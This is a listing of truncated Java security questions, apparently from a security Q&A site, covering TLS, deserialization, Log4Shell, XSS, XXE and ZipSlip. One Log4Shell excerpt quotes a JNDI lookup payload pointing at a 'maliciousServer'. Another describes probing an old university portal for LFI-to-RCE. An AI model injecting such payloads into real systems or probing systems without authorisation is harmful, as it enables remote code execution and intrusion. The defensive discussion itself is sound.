Questions tagged [java]
Security aspects specific to the Java programming language, libraries, and virtual machine.
720 questions
3
votes
7
answers
3k
views
How to Protect Commercial Java Software Running on Client Machines?
I am making my first commercial Java program and am worried about crack prevention. I would run it on the cloud, except it needs to run on their machine at a runtime. I have an obfuscator set up, but ...
- 63
6
votes
3
answers
1k
views
Which is better, configurable TLS version, or hardcoded TLS version?
I am reviewing TLS configurations in my code, there are several places where there is TLS.
In these places, TLS version is hardcoded to TLSv1.2. I want to make sure that TLS 1.3 is also supported. To ...
- 559
0
votes
2
answers
221
views
Session token shown in the log file
I'm working on a JAVA web application running on Tomcat. A session token is generated and stored in a cookie when a user authenticates.
Unfortunately, when tracing is enabled, Tomcat dumps the value ...
- 111
3
votes
2
answers
313
views
Is this code vulnerable to injection?
I'm reviewing code which apparently ignores all security standards but doesn't seem to be exploitable due to its peculiar construction. The first stage is a Java Spring application and the name ...
- 31
1
vote
0
answers
170
views
Trying to reproduce Log4J vulnerability
I'm trying to reproduce log4j vulnerability on my spring-boot java project. I know that version from 2.0 to 2.14.1 are vulnerable, i'm using the 2.14.1 version but but i'm not able to exploit it, ...
- 11
0
votes
0
answers
68
views
Which groovy is safe from gadget chains?
I have a java deserialization vulnerability, with a poc. The poc exploits using the groovy library, and the groovy version is 2.4.19.
When searching online for a CVE related to this gadget I couldn't ...
- 559
0
votes
0
answers
134
views
Should Maven Central artifacts containing known vulnerable artifacts be reported?
I have developed a tool that can find Maven Central JAR artifacts that contain classes from known vulnerable JAR artifacts. This includes but is not limited to fat (uber) JARs, JAR bundles, and ...
- 113
1
vote
0
answers
246
views
Google Login with idToken and JWT (Java)
We are integrating Google login in our app and we intend to use the idToken for authentication. We are already sending the idToken from the app to the back-end server, and intend to verify the token ...
5
votes
2
answers
2k
views
Format string vulnerability in Java?
Can a non-sanitized user input result in a vulnerability if passed to System.out.printf (Or any equivalent function that takes a format)?
Example:
public class Demo {
public static void main(...
- 163
0
votes
1
answer
242
views
Is ZipSlip possible in Java without two dots?
I'm testing a Java application that tries to prevent ZipSlip by simply checking whether the filename contains ".." or "./"
Since it's not a web application, I guess encoding is not ...
- 121
1
vote
1
answer
3k
views
Doing a diff between two keystore files
I have a keystore file with certificates and I want to compare if the second keystore has exactly the same contents as the first one.
One approach would be to extract the certificates using keytool ...
- 221
0
votes
2
answers
293
views
Post Exploitation in Oracle web logic server 10.35 (Oracle Linux Server 3.8)
Web Server : Oracle WebLogic 10.35
Machine : Oracle Linux Server 3.8
I was able to partially exploit this CVE. I can execute any command on server using HTTP request and redirecting its output to a ...
- 15
0
votes
2
answers
2k
views
LFI to RCE in java EE Application
I found vulnerable end-points in my university's old portal. It should not be accessible but I found it somehow.
-> First end-point allows me to upload any kind of file on following path : /home/...
- 15
0
votes
1
answer
612
views
With Response header having content-type: application/json, is it still possible to trigger XSS?
The application is responding using the user supplied request but the content type is set as application/json. Is it possible to trigger still XSS?
This is a language neutral question, it can be Java,...
- 73
1
vote
2
answers
883
views
Coverity flags as unsafe deserialisaton. Is this vulnerable?
Coverity shows the block of code as unsafe deserialization:
String str = OBJECT_MAPPER.writeValueAsString(body); //Body is user controlled
Ferarri myclassobj = OBJECT_MAPPER.readValue(str, Ferarri....
- 73
0
votes
1
answer
229
views
SecureRandom safety?
I need to randomly pick 10 numbers from 1 to 2000. It is very important that this rng cannot be predicted/hacked in any way. Would this be a safe/proper way to do it:
int randomInt;
SecureRandom ...
1
vote
1
answer
291
views
Java Cryptography classes - program agnostic usage
We are planning on implementing encryption or digital signatures using any of the available classes provided by the Java Cryptography Architecture (e.g. KeyPair, MessageDigest, Cipher, KeyStore, ...
- 11
0
votes
0
answers
100
views
Is there any stable Java library to perform the same set of operations on USB tokens as javax.smartcadio does?
I need to perform a public/private key generation on USB devices and store private key parts on at least 3 USB tokens.
Java javax.smartcardio allows to perform such an operation on Smart-cards that I ...
- 111
0
votes
1
answer
243
views
Information leakage from a API 404 response
Our consulting company has received a VAPT from a consulting company on behalf of a financial customer.
The application has an HR/group management module.
Normally employees are created by an ...
- 5,448
1
vote
0
answers
2k
views
Disabling weak cipher suites in Tomcat does not work as expected
I have to get rid of so called "weak security" in a Tomcat application.
A penetration test identified services that accept connections with insecure TLS encryption and hashing algorithms: ...
- 161
1
vote
1
answer
667
views
Jsoup XSS attack with URL encoded input
I'm having a Spring Web Application that exposes REST APIs.
I have implemented XSS filter using Jsoup that strips the input using Safelist.NONE.
The penetration testing team raised a concern where the ...
- 113
1
vote
1
answer
121
views
Is there a way someone can read arrays of bytes which I send with java sockets while using TLS 1.2?
If anyone can answer me pls I just need an anwer. I know thus isn't maybe right place for this question
I created chatting app with sockets in Java 8 and i use TLS 1.2 My question is: Is there any way ...
- 11
1
vote
1
answer
2k
views
Is DPAPI still valid option to protect eg. encryption key?
I have an Java client program for Windows having a properties file that I need to be able to encrypt (protect it if a malicious user accesses the server and properties file) but the client program of ...
- 113
1
vote
0
answers
677
views
Given a Java ECPublicKey ECDSA PublicKey, how can I build an SSH2 public key? [closed]
I have created a ECDSA key and now need to convert this to SSH2 key.
final KeyPairGenerator keyGen = KeyPairGenerator.getInstance("ECDSA");
ECGenParameterSpec params = new ...
- 11
1
vote
0
answers
1k
views
Why is there no fix for the commons beanutils Java deserialization gadget?
I recently came across a vulnerability which was caused by unsafe deserialization (Java) and the use of the Apache Commons library commons-beanutils. The ysoserial project references commons-beanutils ...
- 2,674
0
votes
0
answers
681
views
how to know CVE affects which Jar/artifact?
When I'm trying to analyze CVEs to detect which jars are affected by the CVE, I getting confused.
Let's take as an example this CVE: CVE-2022-22978
In the description:
"In Spring Security ...
- 105
0
votes
2
answers
1k
views
Is TLS version related to the server in a Java thick client application?
In a recent pentest (Java thick client), it was discovered by the pentesters that TLS version 1.3 is not supported. I'm investigating why it is not supported, so I was looking in the Java code for ...
- 105
2
votes
1
answer
190
views
Defining scope of a software pen test
If I own a software and I want to conduct a pen test with pen testers, should I define the scope or do the pen testers assess the software first and they define the scope? How does scope definition ...
- 105
2
votes
2
answers
875
views
Java support for TLS_DHE_RSA_WITH_AES_128_CCM
My test tool uses java and I need it to use TLS_DHE_RSA_WITH_AES_128_CCM.
Does standard java (Oracle) support CCM cipher suites?
I am seeing oracle links mentioning CCM but am not able to make it work....
- 61
-1
votes
1
answer
479
views
Modifying cacerts at runtime
I have an containerized JVM application (multiple actually) running on kubernetes, which needs to trust additional custom/private CAs (which are not known beforehand, the application will be deployed ...
- 101
1
vote
2
answers
983
views
Java XXE vulnerability
If I am already using
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
then do I also need to use
xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities",...
- 11
3
votes
0
answers
2k
views
How to Securely Store Database Password in Java .properties File
I would like to store my DB password in Java .property file and encrypt it using Jasypt. But from what I see, it just moves the problem from hiding the DB Password to hiding the encryption password.
I ...
- 41
17
votes
2
answers
3k
views
How are code-branch side channel attacks mitigated on Java?
When you are working with secret keys, if your code branches unequally it could reveal bits of the secret keys via side channels. So for some algorithms it should branch uniformly independently of the ...
- 317
0
votes
1
answer
517
views
What to do if my java app is still vulnerable to log4shell after upgrading to the latest log4J?
My Java 11 application is being upgraded to fix the log4shell flaw. So first Spring Boot has been upgraded to the latest version.
As my project uses Maven to manage its dependencies, I set the log4j ...
- 101
0
votes
1
answer
320
views
How do different secret-key algorithms generate the same data?
How do different secret-key algorithms generate the same data?
In the snippet below, I use PBEWithMD5AndDES to produce one key, and PBEWithHmacSHA256AndAES_256 to produce another key, but with the ...
- 103
1
vote
0
answers
259
views
Insufficient SSL certificate pinning in an native Android app
I have implemented Certificate Pinning in a prototype of an android app. Here are the steps I followed:
Converted .crt file to .bks file
Added the .bks file to the asset folder in project structure
...
- 11
0
votes
1
answer
761
views
Openssl and Let's Encrypt Cert Chain
I'm trying to understand openssl and some cert issues I was trying to track down. These certs were issued from Let's Encrypt. I will use their site as an example because I see the same behavior there. ...
0
votes
1
answer
3k
views
Does alias in a truststore matter?
I was trying to add a new certificate to our truststore. But I got the alias already exists error.
I can't remove the old certificate yet, but I have to add the new certificate.
Will it matter if I ...
- 1
1
vote
1
answer
542
views
How do I test for Reflected XSS in webpage titles, url parameters and javascript variables?
I have a java web app. I'm using OWASP Java Encoder to encode for html, javascript and url components to mitigate reflected XSS. I'm new to this so I'm not sure on how to test on my web app for the ...
0
votes
0
answers
93
views
Third Party Java 8 Program Running in Java 11 vs Java 8?
If a vendor provides you with a program written for Java 8, is there any security advantage of running that program in the latest OpenJDK build of Java 11 instead of the latest OpenJDK build of Java 8?...
- 113
33
votes
3
answers
21k
views
Am I protected from Log4j vulnerability if I run Java 8u121 or newer?
According to the notes for CVE-2021-44228 at mitre.org:
Java 8u121 (see
https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
protects against remote code execution by defaulting
"...
- 493
3
votes
1
answer
1k
views
How to validate if Log4Shell patch is applied?
Is it enough to upgrade log4j-core and log4j-api to 2.15.0 but leave log4j-slf4j-impl, which is a binding library, to 2.14.1, given that mvn dependency:tree suggests that log4j-slf4j-impl:2.14.1 is ...
- 133
4
votes
1
answer
503
views
Does the log4j RCE vulnerability run even if the message is just a part of the logged string?
Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?
For example, if the code contains:
paramGivenFromOutside = "${jndi:ldap://maliciousServer:...
- 143
0
votes
1
answer
8k
views
CheckMarx SSRF Vulnerability
I have a REST which takes a parameter dataSource as input and myService has follow logic.
@RequestMapping(value ="/save", method = RequestMethod.POST)
public List<String> find(@...
2
votes
0
answers
826
views
Does Java cache intermediate certificates fetched via AIA?
Java supports AIA chasing via the system property com.sun.security.enableAIAcaIssuers (which is disabled per default). There is some documentation available but it is pretty slim regarding details.
I ...
- 131
0
votes
1
answer
367
views
How to encrypt REST body with openid connect OIDC
The big picture is:
an android application which authenticate user with an external openid provider (such as azure AD)
a Java EE server which expose rest endpoints securized with the validation of ...
1
vote
1
answer
315
views
Generate key pair and entropy
I would like to use the method described in https://connect2id.com/products/nimbus-jose-jwt/examples/jwk-generation to generate a key pair in a java application:
import java.util.*;
import com....
- 655
0
votes
0
answers
136
views
SSL newbie - in which scenario a client needs a certificate?
I am new to SSL/TLS, and need some help with understanding.
I am running a java application, which is able to consume HTTP and HTTPS URLs as a client from the internet via httpClient. For that, I don'...
2
votes
3
answers
704
views
About vulnerability in the dependency
I have read many articles about the vulnerability in the program dependency, either direct or transitive.
Here are two questions come out of my mind.
If a dependency A has a vulnerability (Maybe has ...
- 193
0
votes
1
answer
280
views
Unrestricted file write in Java
Would it be possible to write a file to a directory outside of the uploads folder if the $ext variable is used controlled and unrestricted? The uploads directory is empty except for the freshly ...
- 1